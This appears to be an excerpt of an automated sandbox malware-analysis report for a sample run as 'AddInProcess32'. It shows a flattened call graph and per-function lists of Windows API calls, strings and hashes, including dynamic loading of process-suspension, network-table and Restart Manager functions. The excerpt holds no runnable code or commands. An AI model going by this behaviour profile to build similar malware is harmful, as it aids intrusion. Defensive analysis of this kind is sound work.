44824b 47578->47580 47632 448812 11 API calls 2 library calls 47578->47632 47579->47555 47631 446782 20 API calls __dosmaperr 47580->47631 47582 448260 47582->47580 47584 448267 47582->47584 47633 448087 20 API calls _Atexit 47584->47633 47585 448251 47587 44828c SetLastError 47585->47587 47635 4460f4 35 API calls _Atexit 47587->47635 47588 448272 47634 446782 20 API calls __dosmaperr 47588->47634 47592 448279 47592->47579 47592->47587 47594 44f083 ___DestructExceptionObject 47593->47594 47595 448215 _Atexit 35 API calls 47594->47595 47600 44f08d 47595->47600 47597 44f111 ___DestructExceptionObject 47597->47557 47600->47597 47636 4460f4 35 API calls _Atexit 47600->47636 47637 445888 EnterCriticalSection 47600->47637 47638 446782 20 API calls __dosmaperr 47600->47638 47639 44f108 LeaveCriticalSection std::_Lockit::~_Lockit 47600->47639 47640 43a7b7 47602->47640 47605 44ed0d GetOEMCP 47608 44ed36 47605->47608 47606 44ed1f 47607 44ed24 GetACP 47606->47607 47606->47608 47607->47608 47608->47560 47609 446137 47608->47609 47610 446175 47609->47610 47614 446145 ___crtLCMapStringA 47609->47614 47651 4405dd 20 API calls _Atexit 47610->47651 47612 446160 RtlAllocateHeap 47613 446173 47612->47613 47612->47614 47613->47568 47616 44f119 47613->47616 47614->47610 47614->47612 47650 442f80 7 API calls 2 library calls 47614->47650 47617 44ecec 37 API calls 47616->47617 47618 44f138 47617->47618 47621 44f189 IsValidCodePage 47618->47621 47623 44f13f 47618->47623 47625 44f1ae ___scrt_fastfail 47618->47625 47619 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47620 44efba 47619->47620 47620->47566 47620->47569 47622 44f19b GetCPInfo 47621->47622 47621->47623 47622->47623 47622->47625 47623->47619 47652 44edc4 GetCPInfo 47625->47652 47626->47568 47627->47560 47628->47570 47629->47568 47630->47574 47631->47585 47632->47582 47633->47588 47634->47592 47637->47600 47638->47600 47639->47600 47641 43a7d4 47640->47641 47647 43a7ca 47640->47647 47642 448215 _Atexit 35 API calls 47641->47642 47641->47647 47643 43a7f5 47642->47643 47648 448364 35 API calls __Getctype 47643->47648 47645 43a80e 47649 448391 35 API calls __cftoe 47645->47649 47647->47605 47647->47606 47648->47645 47649->47647 47650->47614 47651->47613 47656 44edfe 47652->47656 47661 44eea8 47652->47661 47655 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47658 44ef54 47655->47658 47662 45112c 47656->47662 47658->47623 47660 44ae66 _swprintf 40 API calls 47660->47661 47661->47655 47663 43a7b7 __cftoe 35 API calls 47662->47663 47664 45114c MultiByteToWideChar 47663->47664 47666 45118a 47664->47666 47673 451222 47664->47673 47668 4511ab __alloca_probe_16 ___scrt_fastfail 47666->47668 47669 446137 ___crtLCMapStringA 21 API calls 47666->47669 47667 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47670 44ee5f 47667->47670 47671 45121c 47668->47671 47674 4511f0 MultiByteToWideChar 47668->47674 47669->47668 47676 44ae66 47670->47676 47681 435e40 20 API calls _free 47671->47681 47673->47667 47674->47671 47675 45120c GetStringTypeW 47674->47675 47675->47671 47677 43a7b7 __cftoe 35 API calls 47676->47677 47678 44ae79 47677->47678 47682 44ac49 47678->47682 47681->47673 47683 44ac64 ___crtLCMapStringA 47682->47683 47684 44ac8a MultiByteToWideChar 47683->47684 47685 44acb4 47684->47685 47686 44ae3e 47684->47686 47689 446137 ___crtLCMapStringA 21 API calls 47685->47689 47692 44acd5 __alloca_probe_16 47685->47692 47687 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47686->47687 47688 44ae51 47687->47688 47688->47660 47689->47692 47690 44ad8a 47718 435e40 20 API calls _free 47690->47718 47691 44ad1e MultiByteToWideChar 47691->47690 47693 44ad37 47691->47693 47692->47690 47692->47691 47709 448bb3 47693->47709 47697 44ad61 47697->47690 47700 448bb3 _strftime 11 API calls 47697->47700 47698 44ad99 47699 446137 ___crtLCMapStringA 21 API calls 47698->47699 47702 44adba __alloca_probe_16 47698->47702 47699->47702 47700->47690 47701 44ae2f 47717 435e40 20 API calls _free 47701->47717 47702->47701 47703 448bb3 _strftime 11 API calls 47702->47703 47705 44ae0e 47703->47705 47705->47701 47706 44ae1d WideCharToMultiByte 47705->47706 47706->47701 47707 44ae5d 47706->47707 47719 435e40 20 API calls _free 47707->47719 47720 4484ca 47709->47720 47713 448be3 47715 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 47713->47715 47714 448c23 LCMapStringW 47714->47713 47716 448c35 47715->47716 47716->47690 47716->47697 47716->47698 47717->47690 47718->47686 47719->47690 47721 4484f6 47720->47721 47722 4484fa 47720->47722 47721->47722 47726 44851a 47721->47726 47728 448566 47721->47728 47722->47713 47727 448c3b 10 API calls 3 library calls 47722->47727 47724 448526 GetProcAddress 47725 448536 __crt_fast_encode_pointer 47724->47725 47725->47722 47726->47722 47726->47724 47727->47714 47729 448587 LoadLibraryExW 47728->47729 47734 44857c 47728->47734 47730 4485a4 GetLastError 47729->47730 47731 4485bc 47729->47731 47730->47731 47732 4485af LoadLibraryExW 47730->47732 47733 4485d3 FreeLibrary 47731->47733 47731->47734 47732->47731 47733->47734 47734->47721 47736 41cb8f LoadLibraryA GetProcAddress 47735->47736 47737 41cb7f GetModuleHandleA GetProcAddress 47735->47737 47738 41cbb8 44 API calls 47736->47738 47739 41cba8 LoadLibraryA GetProcAddress 47736->47739 47737->47736 47738->47151 47739->47738 47917 41b4a8 FindResourceA 47740->47917 47744 40f3ed ctype 47927 4020b7 47744->47927 47747 401fe2 28 API calls 47748 40f413 47747->47748 47749 401fd8 11 API calls 47748->47749 47750 40f41c 47749->47750 47751 43bd51 new 21 API calls 47750->47751 47752 40f42d ctype 47751->47752 47933 406dd8 47752->47933 47754 40f460 47754->47153 47756 40210c 47755->47756 47757 4023ce 11 API calls 47756->47757 47758 402126 47757->47758 47759 402569 28 API calls 47758->47759 47760 402134 47759->47760 47760->47156 47987 4020df 47761->47987 47763 41be9e 47764 401fd8 11 API calls 47763->47764 47765 41bed0 47764->47765 47767 401fd8 11 API calls 47765->47767 47766 41bea0 47993 4041a2 28 API calls 47766->47993 47770 41bed8 47767->47770 47772 401fd8 11 API calls 47770->47772 47771 41beac 47773 401fe2 28 API calls 47771->47773 47775 40ea24 47772->47775 47776 41beb5 47773->47776 47774 401fe2 28 API calls 47782 41be2e 47774->47782 47783 40fb17 47775->47783 47777 401fd8 11 API calls 47776->47777 47779 41bebd 47777->47779 47778 401fd8 11 API calls 47778->47782 47994 41ce34 28 API calls 47779->47994 47782->47763 47782->47766 47782->47774 47782->47778 47991 4041a2 28 API calls 47782->47991 47992 41ce34 28 API calls 47782->47992 47784 40fb23 47783->47784 47786 40fb2a 47783->47786 47995 402163 11 API calls 47784->47995 47786->47161 47788 402163 47787->47788 47789 40219f 47788->47789 47996 402730 11 API calls 47788->47996 47789->47163 47791 402184 47997 402712 11 API calls std::_Deallocate 47791->47997 47793->47169 47794->47173 47795->47176 47796->47180 47798 401ff1 47797->47798 47805 402039 47797->47805 47799 4023ce 11 API calls 47798->47799 47800 401ffa 47799->47800 47801 402015 47800->47801 47802 40203c 47800->47802 47998 403098 28 API calls 47801->47998 47999 40267a 11 API calls 47802->47999 47806 401fd8 47805->47806 47807 4023ce 11 API calls 47806->47807 47808 401fe1 47807->47808 47808->47188 47809->47192 47810->47194 47811->47196 47812->47198 47813->47207 48000 401fab 47814->48000 47816 40d073 CreateMutexA GetLastError 47816->47210 47817->47168 47818->47171 47819->47177 47820->47181 47822->47202 47823->47214 47824->47218 47825->47206 47826->47217 47827->47225 47828->47234 47829->47228 47830->47242 47831->47220 47832->47224 47833->47232 47834->47240 47835->47244 47836->47248 47837->47253 47838->47257 47839->47263 47840->47265 47841->47268 47842->47274 47843->47280 47844->47285 47845->47292 47846->47295 47847->47300 47848->47273 47849->47277 47850->47283 47851->47290 47852->47299 47853->47301 47854->47306 47855->47312 47856->47315 47857->47321 47858->47325 47859->47286 47860->47291 47861->47297 47862->47305 47863->47308 47864->47311 47865->47319 47866->47320 47867->47324 47868->47328 47869->47330 47870->47332 47871->47334 47872->47336 47873->47338 47874->47340 47875->47342 47876->47344 47877->47347 47878->47350 47885 4344ef 47879->47885 47880 43bd51 new 21 API calls 47880->47885 47881 40f0d1 47886 401e65 22 API calls 47881->47886 47885->47880 47885->47881 48001 442f80 7 API calls 2 library calls 47885->48001 48002 434c35 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47885->48002 48003 43526e RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47885->48003 47886->47355 47887->47358 47888->47363 47889->47365 47890->47369 47891->47375 47892->47382 47893->47387 47894->47395 47895->47370 47896->47377 47897->47384 47898->47396 47899->47371 47900->47376 47901->47380 47902->47386 47903->47400 47905->47403 47906->47408 47907->47413 47908->47417 47909->47226 47911->47239 47912->47246 47913->47252 47914->47256 47915->47259 48004 41ad17 104 API calls 47916->48004 47918 41b4c5 LoadResource LockResource SizeofResource 47917->47918 47919 40f3de 47917->47919 47918->47919 47920 43bd51 47919->47920 47925 446137 ___crtLCMapStringA 47920->47925 47921 446175 47937 4405dd 20 API calls _Atexit 47921->47937 47923 446160 RtlAllocateHeap 47924 446173 47923->47924 47923->47925 47924->47744 47925->47921 47925->47923 47936 442f80 7 API calls 2 library calls 47925->47936 47928 4020bf 47927->47928 47938 4023ce 47928->47938 47930 4020ca 47942 40250a 47930->47942 47932 4020d9 47932->47747 47934 4020b7 28 API calls 47933->47934 47935 406dec 47934->47935 47935->47754 47936->47925 47937->47924 47939 402428 47938->47939 47940 4023d8 47938->47940 47939->47930 47940->47939 47949 4027a7 11 API calls std::_Deallocate 47940->47949 47943 40251a 47942->47943 47944 402520 47943->47944 47945 402535 47943->47945 47950 402569 47944->47950 47960 4028e8 47945->47960 47948 402533 47948->47932 47949->47939 47971 402888 47950->47971 47952 40257d 47953 402592 47952->47953 47954 4025a7 47952->47954 47976 402a34 22 API calls 47953->47976 47956 4028e8 28 API calls 47954->47956 47959 4025a5 47956->47959 47957 40259b 47977 4029da 22 API calls 47957->47977 47959->47948 47961 4028f1 47960->47961 47962 402953 47961->47962 47963 4028fb 47961->47963 47985 4028a4 22 API calls 47962->47985 47966 402917 47963->47966 47967 402904 47963->47967 47969 402915 47966->47969 47970 4023ce 11 API calls 47966->47970 47979 402cae 47967->47979 47969->47948 47970->47969 47973 402890 47971->47973 47972 402898 47972->47952 47973->47972 47978 402ca3 22 API calls 47973->47978 47976->47957 47977->47959 47980 402cb8 __EH_prolog 47979->47980 47986 402e54 22 API calls 47980->47986 47982 402d24 47983 4023ce 11 API calls 47982->47983 47984 402d92 47983->47984 47984->47969 47986->47982 47988 4020e7 47987->47988 47989 4023ce 11 API calls 47988->47989 47990 4020f2 47989->47990 47990->47782 47991->47782 47992->47782 47993->47771 47994->47763 47995->47786 47996->47791 47997->47789 47998->47805 47999->47805 48001->47885 48012 4127ee 61 API calls 48011->48012 48014 4431a8 _Atexit 48013->48014 48015 4431c0 48014->48015 48016 4432f6 _Atexit GetModuleHandleW 48014->48016 48035 445888 EnterCriticalSection 48015->48035 48018 4431b4 48016->48018 48018->48015 48047 44333a GetModuleHandleExW 48018->48047 48019 443266 48036 4432a6 48019->48036 48023 44323d 48026 443255 48023->48026 48031 4441f5 _Atexit 5 API calls 48023->48031 48024 443283 48039 4432b5 48024->48039 48025 4432af 48056 457729 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 48025->48056 48032 4441f5 _Atexit 5 API calls 48026->48032 48027 4431c8 48027->48019 48027->48023 48055 443f50 20 API calls _Atexit 48027->48055 48031->48026 48032->48019 48035->48027 48057 4458d0 LeaveCriticalSection 48036->48057 48038 44327f 48038->48024 48038->48025 48058 448cc9 48039->48058 48042 4432e3 48045 44333a _Atexit 8 API calls 48042->48045 48043 4432c3 GetPEB 48043->48042 48044 4432d3 GetCurrentProcess TerminateProcess 48043->48044 48044->48042 48046 4432eb ExitProcess 48045->48046 48048 443364 GetProcAddress 48047->48048 48049 443387 48047->48049 48054 443379 48048->48054 48050 443396 48049->48050 48051 44338d FreeLibrary 48049->48051 48052 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48050->48052 48051->48050 48053 4433a0 48052->48053 48053->48015 48054->48049 48055->48023 48057->48038 48059 448ce4 48058->48059 48060 448cee 48058->48060 48062 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48059->48062 48061 4484ca _Atexit 5 API calls 48060->48061 48061->48059 48063 4432bf 48062->48063 48063->48042 48063->48043 48064 434875 48069 434b47 SetUnhandledExceptionFilter 48064->48069 48066 43487a pre_c_initialization 48070 44554b 20 API calls 2 library calls 48066->48070 48068 434885 48069->48066 48070->48068 48071 404e26 WaitForSingleObject 48072 404e40 SetEvent CloseHandle 48071->48072 48073 404e57 closesocket 48071->48073 48074 404ed8 48072->48074 48075 404e64 48073->48075 48076 404e7a 48075->48076 48084 4050e4 83 API calls 48075->48084 48078 404e8c WaitForSingleObject 48076->48078 48079 404ece SetEvent CloseHandle 48076->48079 48085 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48078->48085 48079->48074 48081 404e9b SetEvent WaitForSingleObject 48086 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48081->48086 48083 404eb3 SetEvent CloseHandle CloseHandle 48083->48079 48084->48076 48085->48081 48086->48083 48087 44831e 48095 448710 48087->48095 48091 44833a 48092 448347 48091->48092 48103 44834a 11 API calls 48091->48103 48094 448332 48096 4484ca _Atexit 5 API calls 48095->48096 48097 448737 48096->48097 48098 44874f TlsAlloc 48097->48098 48099 448740 48097->48099 48098->48099 48100 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 48099->48100 48101 448328 48100->48101 48101->48094 48102 448299 20 API calls 3 library calls 48101->48102 48102->48091 48103->48094 48104 40165e 48105 401666 48104->48105 48106 401669 48104->48106 48107 4016a8 48106->48107 48109 401696 48106->48109 48108 4344ea new 22 API calls 48107->48108 48110 40169c 48108->48110 48111 4344ea new 22 API calls 48109->48111 48111->48110

                  Executed Functions

                  Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                  • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad$HandleModule
                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                  • API String ID: 4236061018-3687161714
                  • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                  • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                  • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                  • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                  Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                  • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                  • ExitProcess.KERNEL32 ref: 004432EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$CurrentExitTerminate
                  • String ID: PkGNG
                  • API String ID: 1703294689-263838557
                  • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                  • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                  • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                  • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                  Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434B4C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                  • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                  • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                  • Instruction Fuzzy Hash:
                  Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65synchronizationCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                  • SetEvent.KERNEL32(?), ref: 00404E43
                  • CloseHandle.KERNELBASE(?), ref: 00404E4C
                  • closesocket.WS2_32(?), ref: 00404E5A
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                  • SetEvent.KERNEL32(?), ref: 00404EA2
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                  • SetEvent.KERNEL32(?), ref: 00404EBA
                  • CloseHandle.KERNEL32(?), ref: 00404EBF
                  • CloseHandle.KERNEL32(?), ref: 00404EC4
                  • SetEvent.KERNEL32(?), ref: 00404ED1
                  • CloseHandle.KERNEL32(?), ref: 00404ED6
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                  • String ID: PkGNG
                  • API String ID: 3658366068-263838557
                  • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                  • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                  • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                  • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                  Function 0044AC49 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 216COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 22 44ac49-44ac62 23 44ac64-44ac74 call 446766 22->23 24 44ac78-44ac7d 22->24 23->24 34 44ac76 23->34 26 44ac7f-44ac87 24->26 27 44ac8a-44acae MultiByteToWideChar 24->27 26->27 28 44acb4-44acc0 27->28 29 44ae41-44ae54 call 434fcb 27->29 31 44ad14 28->31 32 44acc2-44acd3 28->32 38 44ad16-44ad18 31->38 35 44acd5-44ace4 call 457190 32->35 36 44acf2-44ad03 call 446137 32->36 34->24 41 44ae36 35->41 49 44acea-44acf0 35->49 36->41 50 44ad09 36->50 38->41 42 44ad1e-44ad31 MultiByteToWideChar 38->42 43 44ae38-44ae3f call 435e40 41->43 42->41 46 44ad37-44ad49 call 448bb3 42->46 43->29 51 44ad4e-44ad52 46->51 53 44ad0f-44ad12 49->53 50->53 51->41 54 44ad58-44ad5f 51->54 53->38 55 44ad61-44ad66 54->55 56 44ad99-44ada5 54->56 55->43 57 44ad6c-44ad6e 55->57 58 44ada7-44adb8 56->58 59 44adf1 56->59 57->41 60 44ad74-44ad8e call 448bb3 57->60 62 44add3-44ade4 call 446137 58->62 63 44adba-44adc9 call 457190 58->63 61 44adf3-44adf5 59->61 60->43 75 44ad94 60->75 66 44adf7-44ae10 call 448bb3 61->66 67 44ae2f-44ae35 call 435e40 61->67 62->67 74 44ade6 62->74 63->67 78 44adcb-44add1 63->78 66->67 80 44ae12-44ae19 66->80 67->41 79 44adec-44adef 74->79 75->41 78->79 79->61 81 44ae55-44ae5b 80->81 82 44ae1b-44ae1c 80->82 83 44ae1d-44ae2d WideCharToMultiByte 81->83 82->83 83->67 84 44ae5d-44ae64 call 435e40 83->84 84->43
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                  • __alloca_probe_16.LIBCMT ref: 0044ACDB
                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                  • __alloca_probe_16.LIBCMT ref: 0044ADC0
                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                  • __freea.LIBCMT ref: 0044AE30
                    • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                  • __freea.LIBCMT ref: 0044AE39
                  • __freea.LIBCMT ref: 0044AE5E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                  • String ID: $C$PkGNG
                  • API String ID: 3864826663-3740547665
                  • Opcode ID: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                  • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                  • Opcode Fuzzy Hash: 362257cb831b64f560ca9c305cbafbf1ddd2a76c4c9bcde51592d12c0f33465e
                  • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                  Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 95 448566-44857a 96 448587-4485a2 LoadLibraryExW 95->96 97 44857c-448585 95->97 99 4485a4-4485ad GetLastError 96->99 100 4485cb-4485d1 96->100 98 4485de-4485e0 97->98 101 4485bc 99->101 102 4485af-4485ba LoadLibraryExW 99->102 103 4485d3-4485d4 FreeLibrary 100->103 104 4485da 100->104 105 4485be-4485c0 101->105 102->105 103->104 106 4485dc-4485dd 104->106 105->100 107 4485c2-4485c9 105->107 106->98 107->106
                  APIs
                  • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
